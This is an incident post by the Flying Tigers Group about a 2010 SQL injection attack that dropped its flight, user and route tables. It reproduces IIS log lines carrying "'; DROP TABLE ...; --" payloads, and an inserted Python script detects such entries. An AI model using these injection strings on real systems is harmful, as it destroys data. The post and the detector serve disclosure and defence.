FTG Lives On!

What Happened?   

In short, we were hacked by one individual who had inside knowledge of our database design and our login code. Our login code is quite old, dating back to 2001, so it's vulnerable to some types of attacks. The person who did this had inside knowledge of our login code and its vulnerabilities. He also had everyone's login username and password, since he had full access to the database as former management. Basically, this individual deleted 3 of our most important database tables, which included all of our member data and flight reports.

We were doubly screwed due to our web host's incompetence. We were under the impression that our web host was backing up our database, as advertised, on a daily, weekly and monthly basis. Come to find out after this attack that our web host had never backed up our database, not even once in the past 6-7 years. The attack was bad, but the fact that our web host didn't have any backup of our database hurt more than anything. We have manual backups of most of our database except for the flight reports database. The flights database was so big we couldn't open it, much less do a manual backup. So we were relying on our web host to run server-level backups of our database. Unfortunately they never did. We have very little recourse, as their SLA says they are not responsible for any kind of data loss. They were nice enough to give us a $50 credit for their incompetence. We returned the favor by cancelling our service.

The Evidence

So you can see the evidence with your own eyes. This is how the attack was executed:

Database transaction log:

The IP performing the attack:

92.105.197.163

---

```text
2010-04-22 07:01:58 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20flights;%20-- 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349 - www.flyingtigersgroup.org 200 0 0 1083 607 1062
2010-04-22 07:09:02 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20users;%20-- 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 200 0 1236 0 649 374500
2010-04-22 07:09:02 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20-- 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 200 0 1236 0 650 306812
2010-04-22 07:15:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20users;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 649 554265
2010-04-22 07:21:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 650 912156
2010-04-22 07:27:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20users;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 649 1206500
2010-04-22 07:33:51 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 650 1540390
2010-04-22 07:39:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 650 1811781
2010-04-22 07:45:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 650 2109359
2010-04-22 07:51:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 650 2365656
2010-04-22 07:57:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 650 2424218
2010-04-22 08:03:52 W3SVC20259 XIBI-7DVITQAVS7 64.185.238.73 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20routes;%20--|-|ASP_0113|Script_timed_out 80 - 92.105.197.163 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+it;+rv:1.9.2.3)+Gecko/20100401+Firefox/3.6.3+(.NET+CLR+3.5.30729) ASPSESSIONIDSCAADCSQ=FFIPOHLDFMEEONLEPJJLECLC;+PASWORDSYSTEMCOOKIE=KEEPMESIGNEDIN=True&COOKIE%5FUSERNAME=AF349;+PHPSESSID=16a524870773fbf39bd266a86e0e75d9 - www.flyingtigersgroup.org 500 0 1236 0 650 2644093
```
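A defender-side check for log entries of this shape, added here as an example (not code from FTG or its web host): it parses IIS W3C lines like those above, decodes the query string, flags parameter values that carry a stacked SQL statement such as the `'; DROP TABLE ...; --` seen in `ftype`, and aggregates per source IP which tables were named and which HTTP status codes came back. The field order, the sample hosts, IPs and user agent are assumptions or constructed placeholders.

```python
import re
from urllib.parse import unquote_plus
# Field order of the IIS W3C entries quoted above (assumed; confirm against the
# real log's "#Fields:" header before relying on these positions).
FIELDS = ["date", "time", "sitename", "computer", "s_ip", "method", "uri_stem",
          "uri_query", "port", "username", "c_ip", "version", "user_agent",
          "cookie", "referer", "host", "status"]
# Quote closing the original literal, statement separator, destructive verb:
# the stacked-query shape carried by the ftype parameter in the log above.
STACKED_SQL = re.compile(r"'\s*;\s*(drop|delete|truncate|alter|update|insert)\b", re.I)
DROP_TABLE = re.compile(r"drop\s+table\s+(\w+)", re.I)

def parse_line(line):
    """Split one W3C log line into a dict; None for header or malformed lines."""
    parts = line.strip().split(" ")
    if line.startswith("#") or len(parts) < len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    # IIS appends script errors to the query: "query|-|ASP_0113|Script_timed_out".
    raw_query, _, asp_error = rec["uri_query"].partition("|")
    rec["asp_error"] = asp_error.lstrip("-|")
    rec["params"] = {}
    for pair in raw_query.split("&"):        # decode key and value separately so an
        key, _, value = pair.partition("=")  # encoded '&' inside a value cannot split it
        rec["params"][unquote_plus(key)] = unquote_plus(value)
    rec["status"] = int(rec["status"])
    return rec

def injected_params(rec):
    # (parameter, decoded value) pairs whose value carries a stacked SQL statement
    return [(k, v) for k, v in rec["params"].items() if STACKED_SQL.search(v)]

def summarize(lines):
    """Per client IP: tables named in DROP TABLE statements and HTTP status counts."""
    summary = {}
    for line in lines:
        rec = parse_line(line)
        hits = injected_params(rec) if rec else []
        if not hits:
            continue
        entry = summary.setdefault(rec["c_ip"], {"tables": set(), "status": {}})
        for _, value in hits:
            entry["tables"].update(t.lower() for t in DROP_TABLE.findall(value))
        entry["status"][rec["status"]] = entry["status"].get(rec["status"], 0) + 1
    return summary
# Constructed sample shaped like the log above (placeholder hosts, IPs, user agent):
# a benign request, a DROP that returned 200, and a DROP that timed out with 500.
SAMPLE_LOG = [
    "2010-04-22 07:00:00 W3SVC1 HOST 10.0.0.1 GET /xFMadmin/flightmanager.asp ftype=C 80 - 203.0.113.5 HTTP/1.1 UA - - www.example.org 200 0 0",
    "2010-04-22 07:01:58 W3SVC1 HOST 10.0.0.1 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20flights;%20-- 80 - 198.51.100.7 HTTP/1.1 UA - - www.example.org 200 0 0",
    "2010-04-22 07:15:52 W3SVC1 HOST 10.0.0.1 GET /xFMadmin/flightmanager.asp ftype=C%27;%20DROP%20TABLE%20users;%20--|-|ASP_0113|Script_timed_out 80 - 198.51.100.7 HTTP/1.1 UA - - www.example.org 500 0 0",
]
```

Run `summarize()` over the real log file line by line; a 200 on a DROP request is the entry to treat as a confirmed loss, while the later 500/Script_timed_out repeats show the same client retrying.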

Who did it, matched to the IP:

Without naming names, it's evident who did it. This person also designed our .php login system. We know it wasn't some random hacker for several reasons. The first one being that the attack used AF349's pilot ID. Some random hacker wouldn't have any idea what a pilot ID was, and would be even less likely to take the time to find out our FTG President's pilot ID. Coincidentally, the person who executed this attack doesn't like AF349, so he tried to frame him. Also, a random hacker would not drop specific tables (which happen to be the 3 most important out of 50+ tables); instead they would drop the entire database. So thank him for trashing over 8 years of flight reports. To the hacker, get professional help.

The Future

What lies ahead for FTG? We're not going to let this asshole's betrayal and incompetence finish us. We're going to continue enjoying our hobby with FTG as we have for so many years. First off, we've already changed our web host to one where we can manually back up our entire database using server backup tools.

The most difficult part will be updating all of our login and management code with a new database design so this doesn't happen again. Unfortunately, since the hacker designed and coded much of our website, we need to dump that code and start from scratch. We can't take a chance with any backdoors he may have implemented. This is going to require professional know-how and some time. This is the second time we've been screwed, so things are going to change. We will no longer use volunteers who have full access to our code or our database. We're going to hire professional programmers to build our systems with anti-asshole security.

The organization, the layout, multiple websites and our rules will remain the same as before. We believe this model works well and our members enjoy what we've built over the years. When the new website is launched all of our members will be starting from zero.

Call to Action

If you were a member before the attack, enjoyed FTG and want to see us return better than before, you can help by making a donation. Obviously, this new build model will require more resources since we're going to hire real programmers. It may cost more, but at least we will see projects completed much faster than with volunteer work. Hopefully we'll also have a more professional look to our websites, with nice eye candy, graphs, etc. With your help we hope to be up and running by this August/September.

To make a donation so we can launch FTG better and stronger than ever click on the Chipin button below. A big thank you to all of our members for their understanding & support!

Eric Thornton Founder Flying Tigers Group - FTG@flyingtigersgroup.org

Many thanks to everyone who chipped in. We've raised $2000 in only a few days. Our goal is to raise between $3000 and $5000. Work has already started on the new login code with anti-SQL injection capability. Thanks for all the support!

 
